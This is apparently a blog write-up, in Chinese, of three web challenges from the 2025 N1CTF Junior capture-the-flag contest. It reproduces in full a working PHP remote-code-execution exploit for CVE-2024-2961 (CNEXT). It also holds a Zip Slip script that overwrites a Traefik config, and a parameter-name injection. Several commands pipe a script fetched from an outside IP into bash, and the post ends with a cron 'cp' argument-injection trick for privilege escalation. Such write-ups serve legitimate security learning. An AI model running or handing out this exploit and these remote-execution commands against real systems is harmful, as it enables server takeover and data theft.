2025 N1CTF Junior Web方向 wp

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2025 N1CTF Junior Web方向 Writeup

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经典php漏洞,CVE-2024-2961,p神的vulhub里面复现过,github有exp

  • exp的Class Remote 需要修改
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#!/usr/bin/env python3
#
# CNEXT: PHP file-read to RCE (CVE-2024-2961)
# Date: 2024-05-27
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# TODO Parse LIBC to know if patched
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload.
#

from __future__ import annotations
import requests
import base64
import zlib

from dataclasses import dataclass
from requests.exceptions import ConnectionError, ChunkedEncodingError

from pwn import *
from ten import *


HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")


class Remote:
def __init__(self, url: str) -> None:
self.url = url
self.session = Session()
self.session.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0",
"Cookie": "PHPSESSID=44349da0d2751b567972c00ac9c7f948",
}

def send(self, path: str) -> Response:
files = {
"avatar": (None, ""), # 空文件
"url": (None, f"php://filter/read=convert.base64-encode/resource={path}")
}
# print(self.url)
requests.post(self.url, headers=self.session.headers, files=files)
"""返回远程文件的内容"""
path2=f"http://39.106.16.204:56236/avatar.php?user=admin"
return self.session.get(path2)

def download(self,path: str) -> bytes:
files = {
"avatar": (None, ""), # 空文件
"url": (None, f"php://filter/convert.base64-encode/resource={path}")
}
requests.post(self.url, headers=self.session.headers, files=files)
path1 = f"http://39.106.16.204:56236/avatar.php?user=admin"
response = self.session.get(path1)
# print(response.content)
data = response.re.search(b".*", flags=re.S).group(0)
return base64.decode(data)

@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
"pad",
"Number of 0x100 chunks to pad with. If the website makes a lot of heap "
"operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
"""CNEXT exploit: RCE using a file read primitive in PHP."""

url: str
command: str
sleep: int = 1
heap: str = None
pad: int = 20

def __post_init__(self):
self.remote = Remote(self.url)
self.log = logger("EXPLOIT")
self.info = {}
self.heap = self.heap and int(self.heap, 16)

def check_vulnerable(self) -> None:
"""Checks whether the target is reachable and properly allows for the various
wrappers and filters that the exploit needs.
"""

def safe_download(path: str) -> bytes:
try:
return self.remote.download(path)
except ConnectionError:
failure("Target not [b]reachable[/] ?")


def check_token(text: str, path: str) -> bool:
result = safe_download(path)
return text.encode() == result

text = tf.random.string(50).encode()
base64 = b64(text, misalign=True).decode()
path = f"data:text/plain;base64,{base64}"

result = safe_download(path)

if text not in result:
msg_failure("Remote.download did not return the test string")
print("--------------------")
print(f"Expected test string: {text}")
print(f"Got: {result}")
print("--------------------")
failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")

msg_info("The [i]data://[/] wrapper works")

text = tf.random.string(50)
base64 = b64(text.encode(), misalign=True).decode()
path = f"php://filter//resource=data:text/plain;base64,{base64}"
if not check_token(text, path):
failure("The [i]php://filter/[/] wrapper does not work")

msg_info("The [i]php://filter/[/] wrapper works")

text = tf.random.string(50)
base64 = b64(compress(text.encode()), misalign=True).decode()
path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"

if not check_token(text, path):
failure("The [i]zlib[/] extension is not enabled")

msg_info("The [i]zlib[/] extension is enabled")

msg_success("Exploit preconditions are satisfied")

def get_file(self, path: str) -> bytes:
with msg_status(f"Downloading [i]{path}[/]..."):
return self.remote.download(path)

def get_regions(self) -> list[Region]:
"""Obtains the memory regions of the PHP process by querying /proc/self/maps."""
maps = self.get_file("/proc/self/maps")
maps = maps.decode()
PATTERN = re.compile(
r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
)
regions = []
for region in table.split(maps, strip=True):
if match := PATTERN.match(region):
start = int(match.group(1), 16)
stop = int(match.group(2), 16)
permissions = match.group(3)
path = match.group(4)
if "/" in path or "[" in path:
path = path.rsplit(" ", 1)[-1]
else:
path = ""
current = Region(start, stop, permissions, path)
regions.append(current)
else:
print(maps)
failure("Unable to parse memory mappings")

self.log.info(f"Got {len(regions)} memory regions")

return regions

def get_symbols_and_addresses(self) -> None:
"""Obtains useful symbols and addresses from the file read primitive."""
regions = self.get_regions()

LIBC_FILE = "/dev/shm/cnext-libc"

# PHP's heap

self.info["heap"] = self.heap or self.find_main_heap(regions)

# Libc

libc = self._get_region(regions, "libc-", "libc.so")

self.download_file(libc.path, LIBC_FILE)

self.info["libc"] = ELF(LIBC_FILE, checksec=False)
self.info["libc"].address = libc.start

def _get_region(self, regions: list[Region], *names: str) -> Region:
"""Returns the first region whose name matches one of the given names."""
for region in regions:
if any(name in region.path for name in names):
break
else:
failure("Unable to locate region")

return region

def download_file(self, remote_path: str, local_path: str) -> None:
"""Downloads `remote_path` to `local_path`"""
data = self.get_file(remote_path)
Path(local_path).write(data)

def find_main_heap(self, regions: list[Region]) -> Region:
# Any anonymous RW region with a size superior to the base heap size is a
# candidate. The heap is at the bottom of the region.
heaps = [
region.stop - HEAP_SIZE + 0x40
for region in reversed(regions)
if region.permissions == "rw-p"
and region.size >= HEAP_SIZE
and region.stop & (HEAP_SIZE-1) == 0
and region.path in ("", "[anon:zend_alloc]")
]

if not heaps:
failure("Unable to find PHP's main heap in memory")

first = heaps[0]

if len(heaps) > 1:
heaps = ", ".join(map(hex, heaps))
msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
else:
msg_info(f"Using [i]{hex(first)}[/] as heap")

return first

def run(self) -> None:
self.check_vulnerable()
self.get_symbols_and_addresses()
self.exploit()

def build_exploit_path(self) -> str:
"""On each step of the exploit, a filter will process each chunk one after the
other. Processing generally involves making some kind of operation either
on the chunk or in a destination chunk of the same size. Each operation is
applied on every single chunk; you cannot make PHP apply iconv on the first 10
chunks and leave the rest in place. That's where the difficulties come from.

Keep in mind that we know the address of the main heap, and the libraries.
ASLR/PIE do not matter here.

The idea is to use the bug to make the freelist for chunks of size 0x100 point
lower. For instance, we have the following free list:

... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00

By triggering the bug from chunk ..900, we get:

... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???

That's step 3.

Now, in order to control the free list, and make it point whereever we want,
we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
That's step 2.

Now, if we were to perform step2 an then step3 without anything else, we'd have
a problem: after step2 has been processed, the free list goes bottom-up, like:

0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900

We need to go the other way around. That's why we have step 1: it just allocates
chunks. When they get freed, they reverse the free list. Now step2 allocates in
reverse order, and therefore after step2, chunks are in the correct order.

Another problem comes up.

To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
Since step2 creates chunks that contain pointers and pointers are generally not
UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
To avoid this, we put the chunks in step2 at the very end of the chain, and
prefix them with `0\n`. When dechunked (right before the iconv), they will
"disappear" from the chain, preserving them from the character set conversion
and saving us from an unwanted processing error that would stop the processing
chain.

After step3 we have a corrupted freelist with an arbitrary pointer into it. We
don't know the precise layout of the heap, but we know that at the top of the
heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
Its free_slot[] array contains a pointer to each free list. By overwriting it,
we can make PHP allocate chunks whereever we want. In addition, its custom_heap
field contains pointers to hook functions for emalloc, efree, and erealloc
(similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
then overwrite the use_custom_heap flag to make PHP use these function pointers
instead. We can now do our favorite CTF technique and get a call to
system(<chunk>).
We make sure that the "system" command kills the current process to avoid other
system() calls with random chunk data, leading to undefined behaviour.

The pad blocks just "pad" our allocations so that even if the heap of the
process is in a random state, we still get contiguous, in order chunks for our
exploit.

Therefore, the whole process described here CANNOT crash. Everything falls
perfectly in place, and nothing can get in the middle of our allocations.
"""

LIBC = self.info["libc"]
ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
ADDR_EFREE = LIBC.symbols["__libc_system"]
ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]

ADDR_HEAP = self.info["heap"]
ADDR_FREE_SLOT = ADDR_HEAP + 0x20
ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168

ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10

CS = 0x100

# Pad needs to stay at size 0x100 at every step
pad_size = CS - 0x18
pad = b"\x00" * pad_size
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = chunked_chunk(pad, len(pad) + 6)
pad = compressed_bucket(pad)

step1_size = 1
step1 = b"\x00" * step1_size
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1)
step1 = chunked_chunk(step1, CS)
step1 = compressed_bucket(step1)

# Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
# ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"

step2_size = 0x48
step2 = b"\x00" * (step2_size + 8)
step2 = chunked_chunk(step2, CS)
step2 = chunked_chunk(step2)
step2 = compressed_bucket(step2)

step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
step2_write_ptr = chunked_chunk(step2_write_ptr)
step2_write_ptr = compressed_bucket(step2_write_ptr)

step3_size = CS

step3 = b"\x00" * step3_size
assert len(step3) == CS
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = chunked_chunk(step3)
step3 = compressed_bucket(step3)

step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
assert len(step3_overflow) == CS
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = chunked_chunk(step3_overflow)
step3_overflow = compressed_bucket(step3_overflow)

step4_size = CS
step4 = b"=00" + b"\x00" * (step4_size - 1)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = chunked_chunk(step4)
step4 = compressed_bucket(step4)

# This chunk will eventually overwrite mm_heap->free_slot
# it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
ADDR_CUSTOM_HEAP, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
ADDR_HEAP, # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size=CS,
)

step4_custom_heap = ptr_bucket(
ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
)

step4_use_custom_heap_size = 0x140

COMMAND = self.command
COMMAND = f"kill -9 $PPID; {COMMAND}"
if self.sleep:
COMMAND = f"sleep {self.sleep}; {COMMAND}"
COMMAND = COMMAND.encode() + b"\x00"

assert (
len(COMMAND) <= step4_use_custom_heap_size
), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")

step4_use_custom_heap = COMMAND
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)

pages = (
step4 * 3
+ step4_pwn
+ step4_custom_heap
+ step4_use_custom_heap
+ step3_overflow
+ pad * self.pad
+ step1 * 3
+ step2_write_ptr
+ step2 * 2
)

resource = compress(compress(pages))
resource = b64(resource)
resource = f"data:text/plain;base64,{resource.decode()}"

filters = [
# Create buckets
"zlib.inflate",
"zlib.inflate",

# Step 0: Setup heap
"dechunk",
"convert.iconv.L1.L1",

# Step 1: Reverse FL order
"dechunk",
"convert.iconv.L1.L1",

# Step 2: Put fake pointer and make FL order back to normal
"dechunk",
"convert.iconv.L1.L1",

# Step 3: Trigger overflow
"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",

# Step 4: Allocate at arbitrary address and change zend_mm_heap
"convert.quoted-printable-decode",
"convert.iconv.L1.L1",
]
filters = "|".join(filters)
path = f"php://filter/read={filters}/resource={resource}"

return path

@inform("Triggering...")
def exploit(self) -> None:
path = self.build_exploit_path()
start = time.time()

try:
self.remote.send(path)
except (ConnectionError, ChunkedEncodingError):
pass

msg_print()

if not self.sleep:
msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
elif start + self.sleep <= time.time():
msg_print(" [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
else:
# Wrong heap, maybe? If the exploited suggested others, use them!
msg_print(" [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")

msg_print()


def compress(data) -> bytes:
"""Returns data suitable for `zlib.inflate`.
"""
# Remove 2-byte header and 4-byte checksum
return zlib.compress(data, 9)[2:-4]


def b64(data: bytes, misalign=True) -> bytes:
payload = base64.encode(data)
if not misalign and payload.endswith("="):
raise ValueError(f"Misaligned: {data}")
return payload.encode()


def compressed_bucket(data: bytes) -> bytes:
"""Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
return chunked_chunk(data, 0x8000)


def qpe(data: bytes) -> bytes:
"""Emulates quoted-printable-encode.
"""
return "".join(f"={x:02x}" for x in data).upper().encode()


def ptr_bucket(*ptrs, size=None) -> bytes:
"""Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
if size is not None:
assert len(ptrs) * 8 == size
bucket = b"".join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)

return bucket


def chunked_chunk(data: bytes, size: int = None) -> bytes:
"""Constructs a chunked representation of the given chunk. If size is given, the
chunked representation has size `size`.
For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
"""
# The caller does not care about the size: let's just add 8, which is more than
# enough
if size is None:
size = len(data) + 8
keep = len(data) + len(b"\n\n")
size = f"{len(data):x}".rjust(size - keep, "0")
return size.encode() + b"\n" + data + b"\n"


@dataclass
class Region:
"""A memory region."""

start: int
stop: int
permissions: str
path: str

@property
def size(self) -> int:
return self.stop - self.start


Exploit()

  • 纪念一下,就因为多了一行header,exp一直跑不通,凌晨5点多终于找到错误点,做出来了
1
python3 exp.py http://ip:port/upload.php "curl http://8.138.152.157/1.txt | bash"

0a41f9b3dec49d95999b37df7ccb0d3

traefik

  • 漏洞点,unzip filepath.Join
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func unzipFile(zipPath, destDir string) error {
zipReader, err := zip.OpenReader(zipPath)
if err != nil {
return err
}
defer zipReader.Close()

for _, file := range zipReader.File {
filePath := filepath.Join(destDir, file.Name)
if file.FileInfo().IsDir() {
if err := os.MkdirAll(filePath, file.Mode()); err != nil {
return err
}
} else {
err = unzipSimpleFile(file, filePath)
if err != nil {
return err
}
}
}
return nil
}

参考:

记一次Zip Slip任意文件写漏洞 - yanq的个人博客

  • 生成zip脚本,去覆盖配置文件
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import zipfile
# the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
# the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'dynamic.yml'
#destination path of the file
zf.write(fname, '../../../../../../../../../../../../../../../../../../../../../../../../app/.config/dynamic.yml')

  • 第一次尝试,失败:
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# Dynamic configuration

http:
services:
proxy:
loadBalancer:
servers:
- url: "http://127.0.0.1:8080"
routers:
index:
rule: Path(`/public/index`)
entrypoints: [web]
service: proxy
upload:
rule: Path(`/public/upload`)
entrypoints: [web]
service: proxy
flag:
rule: Path(`/flag`)
entrypoints: [web]
service: proxy

覆盖掉配置文件,上传后,发现/flag路由可以访问了,加上xxf:127.0.0.1,发现仍然不行

换思路,把写到配置文件里面,去翻官方文档看一看

Traefik File Dynamic Configuration - Traefik

翻到一半,结果发现AI会写

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# Dynamic configuration

http:
middlewares:
set-localhost:
headers:
customRequestHeaders:
X-Forwarded-For: "127.0.0.1" # 设置请求头为 127.0.0.1

services:
proxy:
loadBalancer:
servers:
- url: "http://127.0.0.1:8080" # 请求都转发到 127.0.0.1:8080

routers:
index:
rule: "Path(`/public/index`)" # 匹配路径 /public/index
entryPoints:
- web
service: proxy
middlewares:
- set-localhost # 使用中间件设置请求头

upload:
rule: "Path(`/public/upload`)" # 匹配路径 /public/upload
entryPoints:
- web
service: proxy
middlewares:
- set-localhost # 使用中间件设置请求头

flag:
rule: "Path(`/flag`)" # 匹配路径 /public/upload
entryPoints:
- web
service: proxy
middlewares:
- set-localhost # 使用中间件设置请求头

  • 上传,访问,得到flag

1faefb7ccf194fc7df8931209f98790

backup

  • 太妙了,妙哉,妙哉,但是不知道我的方法是不是预期方法

源码最后一行:

61eed9498037bdeb2c406898b4b0931

参考:

谈一谈PHP中关于非法参数名传参问题_php非法传参-CSDN博客

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http://ip:port?_[2025.happy.new.year=curl http://8.138.152.157/1.txt | bash
  • 唉,弹shell了,这题这么简单????不会吧
  • 好的,权限不够,那提权
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find / -perm -4000 -type f -ls 2>/dev/null 

d222c55e0815ab753fdad023667fcd5

  • ???这样没有可以的呀,完蛋喽

  • 看看文件先,这个不太行

c43cb7cbffafc13a0a196e6b976cfd1

  • 再看backup.sh,有头绪了

2f92ca2f9879d123086988e38709cac

这里关键是

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chmod 755 -R /var/www/html/backup/

他在做一个操作,循环复制primary到backup下面,并设置权限为可读

  • 那我是不是可以通过什么方式把flag搞到primary中去,让他复制到backup,变成可读,就能读flag了

  • 然后就陷入了僵局emmmmmmmm

这个是ps -ef,root确实执行了/backup.sh

76a1a5ecb6f7a165c6808c489ae5dd4

  • 思路断了,尝试劫持环境变量试一试,因为是root一直在执行,但是后来发现不行,cp和sleep都不行,提不了权,这个和前面思路也不符合。

  • 但还是从backup.sh的cp做文章

image-20250211135002199

  • 这是突然看到一个参数,-H
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cp -P * /var/www/html/backup/
  • 那我如果把文件名命名为-H,会不会当成参数执行呢?
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echo '' > '-H'
  • 创建软连接
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ln -s /flag /var/www/html/primary/flag
  • 成功获得flag

af145a3707b0a8cac24cf42c64ae871


2025 N1CTF Junior Web方向 wp
https://xu17.top/2025/02/11/2025N1CTF Junior/
作者
XU17
发布于
2025年2月11日
许可协议
XU17